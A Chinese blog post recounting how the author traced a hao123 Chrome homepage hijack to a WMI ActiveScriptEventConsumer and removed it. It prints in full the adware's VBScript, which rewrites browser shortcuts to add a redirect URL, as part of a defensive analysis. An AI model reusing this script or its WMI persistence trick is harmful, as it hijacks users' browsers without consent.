解决hao123劫持chrome主页问题
近两天隔一段时间打开chrome,主页就被加载到hao123,发现桌面快捷方式指向的目标后面带了一串“小尾巴”。排查了注册表和chrome主页设置,都没问题,判断可能是被劫持了。于是,google大法找着解决方案,如下
原因分析
首先检查了一下chrome的主页设置,发现没有问题,依然是原来的google.com。
然后到chrome的安装目录,直接双击打开chrome程序,没有问题。
然后检查快捷方式。因为我把chrome固定到任务栏上,一般使用的时候都是点击任务栏图标的,而实际上这只是一个快捷方式。右键任务栏chrome图标->右键Google Chrome->属性,就会弹出该快捷方式的属性窗口。发现快捷方式的目标链接已经被修改,多加了一个启动参数:
1 |
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" http://hao.169x.cn/?v=108 |
而这个网址,打开之后就会重定向到hao123.com。
原因找出来了,出现主页被胁持的原因是系统里所有跟chrome有关的快捷方式都被修改,加了一个启动参数导致每次被启动时候都会跳转到这个网址。除了任务栏快捷方式之外,开始菜单中跟chrome有关的所有快捷方式都无一幸免。
修复尝试
定位出这个原因之后,结合网上的一些方法,进行了很多的尝试,最后也没有彻底解决:
手动删掉所有快捷方式中的启动参数。这个方法治标不治本,本来以为这样可以解决了,结果隔了一段时间,或者重启系统之后,所有快捷方式又会被恶意修改。
尝试了一下参考文章2的方法,但是找不到文中所说的注册表项和隐藏文件。
在注册表中搜索所有跟hao123相关的内容,然后删除,但是问题仍然存在。
用Everything搜索本地所有跟hao123相关的文件和文件夹,但是删除之后仍然没有解决问题。
最后找到了参考文章1的方法,但是在WMI event viewer中找不到文中所说的_EventFilter:Name=”unown_filter”
重装chrome,但是一段时间之后恶心的hao123又回来了
把所有chrome快捷方式设为只读,但是发现一段时间之后还是被恶意修改了
解决方法
经过这些头痛的尝试之后,决定先一步一步定位出原因,首先是要看一下到底是什么程序修改了chrome快捷方式。下载Process Monitor,菜单栏Filter->filter,在弹出的窗口中,把chrome的快捷方式路径添加到监视中:
注意这时候不要对chrome进行任何操作,包括打开、右键等等,以免造成干扰。监视一段时间之后,就会发现元凶露出了真面目:
就是这个叫scrcons.exe的程序在修改chrome快捷方式。
这时候发现定位出来的原因跟这篇文章中的原因是一样的,于是再次按照文中所说的方法,用WMI Event Viewer查看WMI事件。但仍然没有在root/subscription里面找到可疑项,最后几番查找,终于在root\CIMV2里面揪出了真凶。
首先打开WMI Event Viewer,点击左上角工具栏中的Register for Events按钮,默认就会连接到root\CIMV2,直接点确定即可。
然后在Consumer in root\CIMV2 -> _EventConsumer -> ActiveScriptEventConsumer下,找到了可疑项。
双击ActiveScriptEventConsumer.Name=”VBScriptKids_consumer”,弹出属性页面:
就会发现chrome快捷方式被修改的元凶 — ScriptText:
1 |
On Error Resume Next:Const link = "http://hao.169x.cn/?v=108":Const link360 = "http://hao.169x.cn/?v=108&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\chenxh\Desktop,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\chenxh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next: |
这个脚本定期就会被系统调用一次,所以就算手动把快捷方式的参数清空,隔一段时间之后又会重新被改回来。
这也是很多流氓软件的常用招数,具体可以参考利用WMI打造完美“三无”后门。
恶意脚本分析
上面的VB脚本用冒号作为分隔符,把一段程序写成了一个语句,为了便于理解,把这段脚本重新排版了一下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
On Error Resume Next Const link = "http://hao.169x.cn/?v=108" Const link360 = "http://hao.169x.cn/?v=108&s=3" browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe" lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\chenxh\Desktop,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\chenxh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" browsersArr = split(browsers,",") Set oDic = CreateObject("scripting.dictionary") For Each browser In browsersArr oDic.Add LCase(browser), browser Next lnkpathsArr = split(lnkpaths,",") Set oFolders = CreateObject("scripting.dictionary") For Each lnkpath In lnkpathsArr oFolders.Add lnkpath, lnkpath Next Set fso = CreateObject("Scripting.Filesystemobject") Set WshShell = CreateObject("Wscript.Shell") For Each oFolder In oFolders If fso.FolderExists(oFolder) Then For Each file In fso.GetFolder(oFolder).Files If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then Set oShellLink = WshShell.CreateShortcut(file.Path) path = oShellLink.TargetPath name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path) If oDic.Exists(LCase(name)) Then If LCase(name) = LCase("360se.exe") Then oShellLink.Arguments = link360 Else oShellLink.Arguments = link End If If file.Attributes And 1 Then file.Attributes = file.Attributes - 1 End If oShellLink.Save End If End If Next End If Next |
可以看到,这段脚本就是遍历所有快捷方式目录(linkpaths)下的所有浏览器(browsers)的快捷方式,然后重新给快捷方式加上启动参数。
至此,飞到嘴里的这只臭苍蝇总算是吐出来了。这也教育我们,要支持正版系统和软件啊!!(正经脸)
张嘴谨慎点,自然不会有苍蝇飞进去了。
以上,感谢博主的经验,学习了。补充一下,退出WMI Event Viewer,以管理员权限重新打开,找到此项目,右键删除,大功告成!
参考:http://xinghao.me/2016/03/01/2016-03-01-kill-hao123/
解决hao123劫持chrome主页问题相关推荐
- 修改 Chrome浏览器主页被劫持 chrome 主页被篡改成hao.qquu8.com的解决方案
修改 Chrome浏览器主页被劫持 chrome 主页被篡改成hao.qquu8.com的解决方案 参考文章: (1)修改 Chrome浏览器主页被劫持 chrome 主页被篡改成hao.qquu8. ...
- 解决hao123胁持chrome等浏览器主页问题
- 转自:http://xinghao.me/2016/03/01/2016-03-01-kill-hao123/ 首先检查了一下chrome的主页设置,发现没有问题,依然是原来的google.com ...
- 谷歌浏览器设置启动页被hao123劫持_win10系统打开chrome主页会被hao123劫持的故障原因及解决方法...
有位win10系统用户最近遇到了一个问题,他反馈有次重启电脑后,好像某某浏览器升级了,然后打开chrome主页就被hao123劫持了,试了很多方法都没有作用.这是怎么回事呢?下面脚本之家的小编带来相应 ...
- 解决chrome主页被hao123劫持的记录
自己的chrome浏览器首页被流氓劫持,每次打开都会跳转至hao123主页, 问题:chrome浏览器打开后默认跳转至hao123页面或其他非自己设置的主页 情况1:chrome快捷方式右键属性,查看 ...
- chrome浏览器主页被hao123劫持、篡改了怎么办
主页被hao123劫持后,打开chrome浏览器会跳转到 803hyescs.30bz.com,情况如下: 我是通过修改chrome浏览器的启动设置解决了,步骤如下: 好辽,我的浏览器恢复清新了!
- win10 hao123劫持html文件,Win10 edge主页被hao123劫持如何解决|edge主页被hao123劫持的解决方法...
Windows10系统自带的edge浏览器功能十分强大,不过有时也会出现一些错误.比如,最近小编发现Edge浏览器的首页被修改成hao123了,通过浏览器设置界面设置后还是没用.经过一番研究,系统城小 ...
- Chrome浏览器首页被hao123劫持的解决办法
Chrome浏览器首页被hao123劫持的解决办法 新电脑装程序,一般小心中招了,谷歌浏览器的首页一直被劫持,打开浏览器自动跳到hao123.网上找了不少办法最后一种才奏效. 1,腾讯管家的浏览器保护 ...
- chrome主页被劫持的解决方法
chrome主页被劫持的解决方法 参考文章: (1)chrome主页被劫持的解决方法 (2)https://www.cnblogs.com/wyh-hde/p/6747867.html 备忘一下.
- 解决 Chrome 主页被 duba 劫持问题——干掉钩子
写了那么久的博客,始于Python爬虫,目前专于Java学习,终于有了属于自己的小窝,欢迎各位访问我的个人网站. 发现问题 前一段时间照常打开 Chrome 浏览器,发现页面跳转到 https://d ...
最新文章
- 华为云客户端_从技术角度解读华为云手机之于普通用户的可行性
- java中有关覆写的总结
- 聊聊flink的OperatorStateBackend
- python lambda函数加法_python lambda的使用详解
- 注册Tomcat服务为系统服务
- 【tool】kali连接rdp远程桌面
- WebView点击图片看大图效果
- python求平均值函数_Python两个练习题,写出私信有奖
- 【Expression 序列化】WCF的简单使用及其Expression Lambada的序列化问题初步解决方案(三)...
- 柔性机械臂_机械臂位置控制概述
- DNF11.22服务器维护到几点,11.22体验服更新详情,文字版。预计正式服更新是11.26...
- 爬虫实现对于百度文库内容的爬取
- Ubuntu添加中文输入法
- 计算机硬盘图标怎么更改,硬盘图标怎么改 更改本地磁盘图标方法
- 打开html文件网页崩溃,浏览器打开就崩溃,浏览器页面打不开
- python阈值计算_基于Python的阈值分割算法实现(二)
- CF898D. Alarm Clock(贪心 双指针)
- MIS系统(12)- 订单管理
- (PTA数据结构与算法) 6-2 顺序表操作集 ——请告诉我什么是顺序表!!!
- 生活中的一些常用理论
热门文章
- 苹果手机的siri在哪里_苹果手机轻敲背面3次自动录音,这个黑科技功能,我真是爱了|苹果手机|手机|siri...
- 开放java平台允许访问_饿了么开放平台接入(2)——使用Java对接店铺
- CAD怎么画精确数值直线?
- 内在动力,过度理由效应
- ASP.NET开源CMS
- 教你安装Atom编辑器并使用震撼的编辑效果
- unity 抛物线运动计算|【高楼抛物】|自动计算加速度,空中移动时间
- 如何在电脑上下载和卸载软件
- 用多智能体强化学习算法MADDPG解决“老鹰捉小鸡“问题
- 百度地图POI数据采集方案以及开发环境搭建